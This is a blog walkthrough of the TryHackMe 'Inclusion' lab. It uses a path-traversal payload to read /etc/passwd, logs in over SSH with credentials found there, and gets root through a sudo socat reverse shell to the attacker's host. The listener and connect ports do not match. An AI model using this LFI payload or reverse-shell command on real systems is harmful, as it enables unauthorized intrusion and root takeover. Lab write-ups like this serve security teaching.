TryHackMe Inclusion
@ Animesh Roy | Thursday, Jul 8, 2021 | 2 minutes read | Update at Thursday, Jul 8, 2021

inclusion

task 01: Deploy

This is a beginner level room designed for people who want to get familiar with Local file inclusion vulnerability.

Task 02: Root It

Recon

Nmap

nmap found two open TCP ports, SSH (22) and HTTP (80):

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-08 14:35 IST
Nmap scan report for 10.10.206.247
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.52 seconds

website

website

this is LFI lab, let’s try opening up the posts and see what we can do.

lfi?

we got a input paramere, where you can modify values. let’s try reading out /etc/psswd file. this is public readble file in linux.

http://<machine-ip>/article?name=../../../../../../etc/passwd

Turns out we can read the local /etc/passwd file.

lfi-2

and we got a credentials commented out in file.

creds

trying SSH to access with found creds.

┌──(anir0y㉿kali)-[~/share/thm/room/inclusion]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

credentials worked! user key in ~/ dir named user.txt

Root

we have a working ssh access to the server, let’s try to find out to be a root.

I’m going to start with sudo -l command to see if falconfeast have any sudo run privileges.

# user can run socat with no password required. 
falconfeast@inclusion:~$ sudo -l 
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

Nice easy privesc here — we’ve got sudo access for socat, which is essentially a more powerful (if more complex) version of Netcat. In other words, we can use socat to send ourselves a root shell. First, on your own attacking computer, run this command:

socat file:`tty`,raw,echo=0 tcp-listen:9001

This will setup a socat listener on your own machine.

On the remote machine, use this command:

sudo socat tcp-connect:<your-ip-address>:1234 exec:bash,pty,stderr,setsid,sigint,sane

we got the flag!!!

root

you can learn more about socat in this amazing room: SHELL

Bonus

you could’ve been got both flag with web LFI itself. I don’t know that is intented way or not. but hey! you got that option too.

  • User via web: user-via-web
  • root via web: root-via-web

© 2010 - 2024 Classroom

Reading Stuffs

Social Links

YOU CAN REUSE MY CONTENT